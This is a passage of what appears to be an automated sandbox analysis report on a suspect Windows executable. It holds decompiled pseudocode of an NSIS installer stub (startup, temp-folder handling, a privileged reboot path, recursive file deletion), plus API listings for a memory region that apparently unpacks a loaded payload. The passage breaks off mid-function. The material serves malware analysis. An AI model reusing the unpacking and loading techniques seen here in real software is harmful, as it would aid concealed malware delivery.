3480->3482 3483 405aa7 18 API calls 3481->3483 3484 405aa7 18 API calls 3482->3484 3486 4018ba lstrcatA 3483->3486 3487 4018cd 3484->3487 3486->3487 3489 
405346 MessageBoxIndirectA 3487->3489 3488->3471 3488->3474 3489->3474 3490->3469 3492 402f12 SetFilePointer 3491->3492 3493 402f2e 3491->3493 3492->3493 3521 40302c GetTickCount 3493->3521 3496 402f3f ReadFile 3497 402f5f 3496->3497 3502 401876 3496->3502 3498 40302c 42 API calls 3497->3498 3497->3502 3499 402f76 3498->3499 3500 402ff1 ReadFile 3499->3500 3499->3502 3503 402f86 3499->3503 3500->3502 3502->3477 3502->3478 3503->3502 3504 402fa1 ReadFile 3503->3504 3505 402fba WriteFile 3503->3505 3504->3502 3504->3503 3505->3502 3505->3503 3506->3459 3507->3460 3509 405592 lstrcatA 3508->3509 3510 401772 lstrcatA 3508->3510 3509->3510 3510->3459 3512 405d92 FindClose 3511->3512 3513 405d9d 3511->3513 3512->3513 3513->3469 3515 405759 3514->3515 3516 40574c SetFileAttributesA 3514->3516 3515->3469 3516->3515 3518 40535b 3517->3518 3519 4053a7 3518->3519 3520 40536f MessageBoxIndirectA 3518->3520 3519->3469 3520->3519 3522 403196 3521->3522 3523 40305b 3521->3523 3524 402bc5 32 API calls 3522->3524 3534 4031da SetFilePointer 3523->3534 3530 402f37 3524->3530 3526 403066 SetFilePointer 3531 40308b 3526->3531 3530->3496 3530->3502 3531->3530 3532 403120 WriteFile 3531->3532 3533 403177 SetFilePointer 3531->3533 3535 4031a8 ReadFile 3531->3535 3537 405e9d 3531->3537 3544 402bc5 3531->3544 3532->3530 3532->3531 3533->3522 3534->3526 3536 4031c9 3535->3536 3536->3531 3538 405ec2 3537->3538 3539 405eca 3537->3539 3538->3531 3539->3538 3540 405f51 GlobalFree 3539->3540 3541 405f5a GlobalAlloc 3539->3541 3542 405fd1 GlobalAlloc 3539->3542 3543 405fc8 GlobalFree 3539->3543 3540->3541 3541->3538 3541->3539 3542->3538 3542->3539 3543->3542 3545 402bd3 3544->3545 3546 402beb 3544->3546 3547 402bdc DestroyWindow 3545->3547 3550 402be3 3545->3550 3548 402bf3 3546->3548 3549 402bfb GetTickCount 3546->3549 3547->3550 3559 405ddc 3548->3559 3549->3550 3552 402c09 3549->3552 3550->3531 3553 402c11 3552->3553 3554 402c3e CreateDialogParamA 3552->3554 3553->3550 3563 402ba9 3553->3563 
3554->3550 3556 402c1f wsprintfA 3557 404e23 25 API calls 3556->3557 3558 402c3c 3557->3558 3558->3550 3560 405df9 PeekMessageA 3559->3560 3561 405e09 3560->3561 3562 405def DispatchMessageA 3560->3562 3561->3550 3562->3560 3564 402bb8 3563->3564 3565 402bba MulDiv 3563->3565 3564->3565 3565->3556 4583 401634 4584 4029e8 18 API calls 4583->4584 4585 40163a 4584->4585 4586 405d7c 2 API calls 4585->4586 4587 401640 4586->4587 4588 401934 4589 4029cb 18 API calls 4588->4589 4590 40193b 4589->4590 4591 4029cb 18 API calls 4590->4591 4592 401945 4591->4592 4593 4029e8 18 API calls 4592->4593 4594 40194e 4593->4594 4595 401961 lstrlenA 4594->4595 4600 40199c 4594->4600 4596 40196b 4595->4596 4596->4600 4601 405a85 lstrcpynA 4596->4601 4598 401985 4599 401992 lstrlenA 4598->4599 4598->4600 4599->4600 4601->4598 4871 4019b5 4872 4029e8 18 API calls 4871->4872 4873 4019bc 4872->4873 4874 4029e8 18 API calls 4873->4874 4875 4019c5 4874->4875 4876 4019cc lstrcmpiA 4875->4876 4877 4019de lstrcmpA 4875->4877 4878 4019d2 4876->4878 4877->4878 4879 4014b7 4880 4014bd 4879->4880 4881 401389 2 API calls 4880->4881 4882 4014c5 4881->4882 4883 4025be 4884 4025c5 4883->4884 4886 40282a 4883->4886 4885 4029cb 18 API calls 4884->4885 4887 4025d0 4885->4887 4888 4025d7 SetFilePointer 4887->4888 4888->4886 4889 4025e7 4888->4889 4891 4059e3 wsprintfA 4889->4891 4891->4886

                  Control-flow Graph (first block 403225-4032ba; legend: Executed / Not Executed)
                  C-Code - Quality: 82%
                  			_entry_() {
                  				struct _SHFILEINFOA _v360;
                  				struct _SECURITY_ATTRIBUTES* _v376;
                  				char _v380;
                  				CHAR* _v384;
                  				char _v396;
                  				int _v400;
                  				int _v404;
                  				CHAR* _v408;
                  				intOrPtr _v412;
                  				int _v416;
                  				intOrPtr _v420;
                  				struct _SECURITY_ATTRIBUTES* _v424;
                  				void* _v432;
                  				int _t34;
                  				CHAR* _t39;
                  				char* _t42;
                  				signed int _t44;
                  				void* _t48;
                  				intOrPtr _t50;
                  				signed int _t52;
                  				signed int _t55;
                  				int _t56;
                  				signed int _t60;
                  				void* _t79;
                  				void* _t89;
                  				void* _t91;
                  				char* _t96;
                  				signed int _t97;
                  				void* _t98;
                  				signed int _t99;
                  				signed int _t100;
                  				signed int _t103;
                  				CHAR* _t105;
                  				signed int _t106;
                  				char _t120;
                  
                  				_v376 = 0;
                  				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                  				_t99 = 0;
                  				_v380 = 0x20;
                  				__imp__#17();
                  				_t34 = SetErrorMode(0x8001); // executed
                  				__imp__OleInitialize(0); // executed
                  				 *0x423f58 = _t34;
                  				 *0x423ea4 = E00405DA3(8);
                  				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
                  				E00405A85(0x4236a0, "NSIS Error");
                  				_t39 = GetCommandLineA();
                  				_t96 = "\"C:\\Users\\engineer\\Desktop\\kVijllv0Yl.exe\" ";
                  				E00405A85(_t96, _t39);
                  				 *0x423ea0 = GetModuleHandleA(0);
                  				_t42 = _t96;
                  				if("\"C:\\Users\\engineer\\Desktop\\kVijllv0Yl.exe\" " == 0x22) {
                  					_v404 = 0x22;
                  					_t42 =  &M00429001;
                  				}
                  				_t44 = CharNextA(E004055A3(_t42, _v404));
                  				_v404 = _t44;
                  				while(1) {
                  					_t91 =  *_t44;
                  					_t109 = _t91;
                  					if(_t91 == 0) {
                  						break;
                  					}
                  					__eflags = _t91 - 0x20;
                  					if(_t91 != 0x20) {
                  						L5:
                  						__eflags =  *_t44 - 0x22;
                  						_v404 = 0x20;
                  						if( *_t44 == 0x22) {
                  							_t44 = _t44 + 1;
                  							__eflags = _t44;
                  							_v404 = 0x22;
                  						}
                  						__eflags =  *_t44 - 0x2f;
                  						if( *_t44 != 0x2f) {
                  							L15:
                  							_t44 = E004055A3(_t44, _v404);
                  							__eflags =  *_t44 - 0x22;
                  							if(__eflags == 0) {
                  								_t44 = _t44 + 1;
                  								__eflags = _t44;
                  							}
                  							continue;
                  						} else {
                  							_t44 = _t44 + 1;
                  							__eflags =  *_t44 - 0x53;
                  							if( *_t44 == 0x53) {
                  								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                  								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                  									_t99 = _t99 | 0x00000002;
                  									__eflags = _t99;
                  								}
                  							}
                  							__eflags =  *_t44 - 0x4352434e;
                  							if( *_t44 == 0x4352434e) {
                  								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                  								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                  									_t99 = _t99 | 0x00000004;
                  									__eflags = _t99;
                  								}
                  							}
                  							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                  							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                  								 *((intOrPtr*)(_t44 - 2)) = 0;
                  								__eflags = _t44 + 2;
                  								E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t44 + 2);
                  								L20:
                  								_t105 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                  								GetTempPathA(0x400, _t105);
                  								_t48 = E004031F1(_t109);
                  								_t110 = _t48;
                  								if(_t48 != 0) {
                  									L22:
                  									DeleteFileA("1033"); // executed
                  									_t50 = E00402C5B(_t111, _t99); // executed
                  									_v412 = _t50;
                  									if(_t50 != 0) {
                  										L32:
                  										E004035A6();
                  										__imp__OleUninitialize();
                  										if(_v408 == 0) {
                  											__eflags =  *0x423f34;
                  											if( *0x423f34 != 0) {
                  												_t106 = E00405DA3(3);
                  												_t100 = E00405DA3(4);
                  												_t55 = E00405DA3(5);
                  												__eflags = _t106;
                  												_t97 = _t55;
                  												if(_t106 != 0) {
                  													__eflags = _t100;
                  													if(_t100 != 0) {
                  														__eflags = _t97;
                  														if(_t97 != 0) {
                  															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                  															__eflags = _t60;
                  															if(_t60 != 0) {
                  																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                  																_v416 = 1;
                  																_v404 = 2;
                  																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                  															}
                  														}
                  													}
                  												}
                  												_t56 = ExitWindowsEx(2, 0);
                  												__eflags = _t56;
                  												if(_t56 == 0) {
                  													E0040140B(9);
                  												}
                  											}
                  											_t52 =  *0x423f4c;
                  											__eflags = _t52 - 0xffffffff;
                  											if(_t52 != 0xffffffff) {
                  												_v400 = _t52;
                  											}
                  											ExitProcess(_v400);
                  										}
                  										E00405346(_v408, 0x200010);
                  										ExitProcess(2);
                  									}
                  									if( *0x423ebc == 0) {
                  										L31:
                  										 *0x423f4c =  *0x423f4c | 0xffffffff;
                  										_v400 = E004035E3();
                  										goto L32;
                  									}
                  									_t103 = E004055A3(_t96, 0);
                  									while(_t103 >= _t96) {
                  										__eflags =  *_t103 - 0x3d3f5f20;
                  										if(__eflags == 0) {
                  											break;
                  										}
                  										_t103 = _t103 - 1;
                  										__eflags = _t103;
                  									}
                  									_t115 = _t103 - _t96;
                  									_v408 = "Error launching installer";
                  									if(_t103 < _t96) {
                  										lstrcatA(_t105, "~nsu.tmp");
                  										if(lstrcmpiA(_t105, "C:\\Users\\engineer\\Desktop") == 0) {
                  											goto L32;
                  										}
                  										CreateDirectoryA(_t105, 0);
                  										SetCurrentDirectoryA(_t105);
                  										_t120 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
                  										if(_t120 == 0) {
                  											E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", "C:\\Users\\engineer\\Desktop");
                  										}
                  										E00405A85(0x424000, _v396);
                  										 *0x424400 = 0x41;
                  										_t98 = 0x1a;
                  										do {
                  											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
                  											DeleteFileA(0x41f050);
                  											if(_v416 != 0 && CopyFileA("C:\\Users\\engineer\\Desktop\\kVijllv0Yl.exe", 0x41f050, 1) != 0) {
                  												_push(0);
                  												_push(0x41f050);
                  												E004057D3();
                  												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
                  												_t79 = E004052E5(0x41f050);
                  												if(_t79 != 0) {
                  													CloseHandle(_t79);
                  													_v416 = 0;
                  												}
                  											}
                  											 *0x424400 =  *0x424400 + 1;
                  											_t98 = _t98 - 1;
                  										} while (_t98 != 0);
                  										_push(0);
                  										_push(_t105);
                  										E004057D3();
                  										goto L32;
                  									}
                  									 *_t103 = 0;
                  									_t104 = _t103 + 4;
                  									if(E00405659(_t115, _t103 + 4) == 0) {
                  										goto L32;
                  									}
                  									E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
                  									E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
                  									_v424 = 0;
                  									goto L31;
                  								}
                  								GetWindowsDirectoryA(_t105, 0x3fb);
                  								lstrcatA(_t105, "\\Temp");
                  								_t89 = E004031F1(_t110);
                  								_t111 = _t89;
                  								if(_t89 == 0) {
                  									goto L32;
                  								}
                  								goto L22;
                  							}
                  							goto L15;
                  						}
                  					} else {
                  						goto L4;
                  					}
                  					do {
                  						L4:
                  						_t44 = _t44 + 1;
                  						__eflags =  *_t44 - 0x20;
                  					} while ( *_t44 == 0x20);
                  					goto L5;
                  				}
                  				goto L20;
                  			}

                  APIs
                  • #17.COMCTL32 ref: 00403244
                  • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                  • OleInitialize.OLE32(00000000), ref: 00403256
                    • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                    • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                    • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                  • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                    • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                  • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,00000000), ref: 004032A6
                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,00000020), ref: 004032D1
                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                  • DeleteFileA.KERNELBASE(1033), ref: 00403398
                  • OleUninitialize.OLE32(00000000), ref: 00403416
                  • ExitProcess.KERNEL32 ref: 00403436
                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,00000000,00000000), ref: 00403442
                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,00000000,00000000), ref: 0040344E
                  • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                  • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\kVijllv0Yl.exe,0041F050,00000001), ref: 004034BF
                  • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                  • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                  • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                  • ExitProcess.KERNEL32 ref: 004035A0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                  • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\kVijllv0Yl.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\kVijllv0Yl.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                  • API String ID: 2278157092-2453130239
                  • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                  • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                  • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                  • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 248 4053aa-4053c5 call 405659 251 4053c7-4053d9 DeleteFileA 248->251 252 4053de-4053e8 248->252 253 405572-405575 251->253 254 4053ea-4053ec 252->254 255 4053fc-40540a call 405a85 252->255 256 4053f2-4053f6 254->256 257 40551d-405523 254->257 263 405419-40541a call 4055bf 255->263 264 40540c-405417 lstrcatA 255->264 256->255 256->257 257->253 259 405525-405528 257->259 261 405532-40553a call 405d7c 259->261 262 40552a-405530 259->262 261->253 272 40553c-405551 call 405578 call 40573d RemoveDirectoryA 261->272 262->253 267 40541f-405422 263->267 264->267 268 405424-40542b 267->268 269 40542d-405433 lstrcatA 267->269 268->269 271 405438-405456 lstrlenA FindFirstFileA 268->271 269->271 273 405513-405517 271->273 274 40545c-405473 call 4055a3 271->274 284 405553-405557 272->284 285 40556a-40556d call 404e23 272->285 273->257 276 405519 273->276 281 405475-405479 274->281 282 40547e-405481 274->282 276->257 281->282 286 40547b 281->286 287 405483-405488 282->287 288 405494-4054a2 call 405a85 282->288 284->262 289 405559-405568 call 404e23 call 4057d3 284->289 285->253 286->282 291 4054f2-405504 FindNextFileA 287->291 292 40548a-40548c 287->292 298 4054a4-4054ac 288->298 299 4054b9-4054c8 call 40573d DeleteFileA 288->299 289->253 291->274 296 40550a-40550d FindClose 291->296 292->288 297 40548e-405492 292->297 296->273 297->288 297->291 298->291 301 4054ae-4054b7 call 4053aa 298->301 308 4054ea-4054ed call 404e23 299->308 309 4054ca-4054ce 299->309 301->291 308->291 311 4054d0-4054e0 call 404e23 call 4057d3 309->311 312 4054e2-4054e8 309->312 311->291 312->291
                  C-Code - Quality: 94%
                  			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                  				signed int _v8;
                  				signed int _v12;
                  				struct _WIN32_FIND_DATAA _v332;
                  				signed int _t37;
                  				char* _t49;
                  				signed int _t52;
                  				signed int _t55;
                  				signed int _t61;
                  				signed int _t63;
                  				void* _t65;
                  				signed int _t68;
                  				CHAR* _t70;
                  				CHAR* _t72;
                  				char* _t75;
                  
                  				_t72 = _a4;
                  				_t37 = E00405659(__eflags, _t72);
                  				_v12 = _t37;
                  				if((_a8 & 0x00000008) != 0) {
                  					_t63 = DeleteFileA(_t72); // executed
                  					asm("sbb eax, eax");
                  					_t65 =  ~_t63 + 1;
                  					 *0x423f28 =  *0x423f28 + _t65;
                  					return _t65;
                  				}
                  				_t68 = _a8 & 0x00000001;
                  				__eflags = _t68;
                  				_v8 = _t68;
                  				if(_t68 == 0) {
                  					L5:
                  					E00405A85(0x4214a0, _t72);
                  					__eflags = _t68;
                  					if(_t68 == 0) {
                  						E004055BF(_t72);
                  					} else {
                  						lstrcatA(0x4214a0, "\*.*");
                  					}
                  					__eflags =  *_t72;
                  					if( *_t72 != 0) {
                  						L10:
                  						lstrcatA(_t72, 0x40900c);
                  						L11:
                  						_t70 =  &(_t72[lstrlenA(_t72)]);
                  						_t37 = FindFirstFileA(0x4214a0,  &_v332);
                  						__eflags = _t37 - 0xffffffff;
                  						_a4 = _t37;
                  						if(_t37 == 0xffffffff) {
                  							L29:
                  							__eflags = _v8;
                  							if(_v8 != 0) {
                  								_t31 = _t70 - 1;
                  								 *_t31 =  *(_t70 - 1) & 0x00000000;
                  								__eflags =  *_t31;
                  							}
                  							goto L31;
                  						} else {
                  							goto L12;
                  						}
                  						do {
                  							L12:
                  							_t75 =  &(_v332.cFileName);
                  							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
                  							__eflags =  *_t49;
                  							if( *_t49 != 0) {
                  								__eflags = _v332.cAlternateFileName;
                  								if(_v332.cAlternateFileName != 0) {
                  									_t75 =  &(_v332.cAlternateFileName);
                  								}
                  							}
                  							__eflags =  *_t75 - 0x2e;
                  							if( *_t75 != 0x2e) {
                  								L19:
                  								E00405A85(_t70, _t75);
                  								__eflags = _v332.dwFileAttributes & 0x00000010;
                  								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                  									E0040573D(_t72);
                  									_t52 = DeleteFileA(_t72);
                  									__eflags = _t52;
                  									if(_t52 != 0) {
                  										E00404E23(0xfffffff2, _t72);
                  									} else {
                  										__eflags = _a8 & 0x00000004;
                  										if((_a8 & 0x00000004) == 0) {
                  											 *0x423f28 =  *0x423f28 + 1;
                  										} else {
                  											E00404E23(0xfffffff1, _t72);
                  											_push(0);
                  											_push(_t72);
                  											E004057D3();
                  										}
                  									}
                  								} else {
                  									__eflags = (_a8 & 0x00000003) - 3;
                  									if(__eflags == 0) {
                  										E004053AA(_t70, __eflags, _t72, _a8);
                  									}
                  								}
                  								goto L27;
                  							}
                  							_t61 =  *((intOrPtr*)(_t75 + 1));
                  							__eflags = _t61;
                  							if(_t61 == 0) {
                  								goto L27;
                  							}
                  							__eflags = _t61 - 0x2e;
                  							if(_t61 != 0x2e) {
                  								goto L19;
                  							}
                  							__eflags =  *((char*)(_t75 + 2));
                  							if( *((char*)(_t75 + 2)) == 0) {
                  								goto L27;
                  							}
                  							goto L19;
                  							L27:
                  							_t55 = FindNextFileA(_a4,  &_v332);
                  							__eflags = _t55;
                  						} while (_t55 != 0);
                  						_t37 = FindClose(_a4);
                  						goto L29;
                  					}
                  					__eflags =  *0x4214a0 - 0x5c;
                  					if( *0x4214a0 != 0x5c) {
                  						goto L11;
                  					}
                  					goto L10;
                  				} else {
                  					__eflags = _t37;
                  					if(_t37 == 0) {
                  						L31:
                  						__eflags = _v8;
                  						if(_v8 == 0) {
                  							L39:
                  							return _t37;
                  						}
                  						__eflags = _v12;
                  						if(_v12 != 0) {
                  							_t37 = E00405D7C(_t72);
                  							__eflags = _t37;
                  							if(_t37 == 0) {
                  								goto L39;
                  							}
                  							E00405578(_t72);
                  							E0040573D(_t72);
                  							_t37 = RemoveDirectoryA(_t72);
                  							__eflags = _t37;
                  							if(_t37 != 0) {
                  								return E00404E23(0xffffffe5, _t72);
                  							}
                  							__eflags = _a8 & 0x00000004;
                  							if((_a8 & 0x00000004) == 0) {
                  								goto L33;
                  							}
                  							E00404E23(0xfffffff1, _t72);
                  							_push(0);
                  							_push(_t72);
                  							return E004057D3();
                  						}
                  						L33:
                  						 *0x423f28 =  *0x423f28 + 1;
                  						return _t37;
                  					}
                  					__eflags = _a8 & 0x00000002;
                  					if((_a8 & 0x00000002) == 0) {
                  						goto L31;
                  					}
                  					goto L5;
                  				}
                  			}

                  APIs
                  • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 004053C8
                  • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 00405412
                  • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 00405433
                  • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 00405439
                  • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\kVijllv0Yl.exe" ,747DF560), ref: 0040544A
                  • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                  • FindClose.KERNEL32(?), ref: 0040550D
                  Strings
                  • "C:\Users\user\Desktop\kVijllv0Yl.exe" , xrefs: 004053B4
                  • \*.*, xrefs: 0040540C
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                  • String ID: "C:\Users\user\Desktop\kVijllv0Yl.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                  • API String ID: 2035342205-1053051898
                  • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                  • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                  • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                  • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  [Control-flow graph figure; legend: Executed / Not Executed]
                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021B04DC
                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 021B0506
                  • ReadFile.KERNELBASE(00000000,00000000,021B0248,?,00000000), ref: 021B051D
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 021B053F
                  • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,021B019C,7FDFFF66), ref: 021B05B2
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 021B05BD
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,021B019C), ref: 021B0608
                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                  • String ID:
                  • API String ID: 656311269-0
                  • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                  • Instruction ID: 39427fcadce8d828dbd2868184c4cd17aab02708d5b0d282499a48f58dbd9f46
                  • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                  • Instruction Fuzzy Hash: 9C617B31E80218AFCB22DBB4C884BEFB7B6AF48750F148159E515EB690EB349E01CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  [Control-flow graph figure; legend: Executed / Not Executed]
                  C-Code - Quality: 98%
                  			E0040604C() {
                  				unsigned short _t531;
                  				signed int _t532;
                  				void _t533;
                  				void* _t534;
                  				signed int _t535;
                  				signed int _t565;
                  				signed int _t568;
                  				signed int _t590;
                  				signed int* _t607;
                  				void* _t614;
                  
                  				L0:
                  				while(1) {
                  					L0:
                  					if( *(_t614 - 0x40) != 0) {
                  						 *(_t614 - 0x34) = 1;
                  						 *(_t614 - 0x84) = 7;
                  						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                  						L132:
                  						 *(_t614 - 0x54) = _t607;
                  						L133:
                  						_t531 =  *_t607;
                  						_t590 = _t531 & 0x0000ffff;
                  						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                  						if( *(_t614 - 0xc) >= _t565) {
                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                  							 *(_t614 - 0x40) = 1;
                  							_t532 = _t531 - (_t531 >> 5);
                  							 *_t607 = _t532;
                  						} else {
                  							 *(_t614 - 0x10) = _t565;
                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                  							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                  						}
                  						if( *(_t614 - 0x10) >= 0x1000000) {
                  							L139:
                  							_t533 =  *(_t614 - 0x84);
                  							L140:
                  							 *(_t614 - 0x88) = _t533;
                  							goto L1;
                  						} else {
                  							L137:
                  							if( *(_t614 - 0x6c) == 0) {
                  								 *(_t614 - 0x88) = 5;
                  								goto L170;
                  							}
                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                  							goto L139;
                  						}
                  					} else {
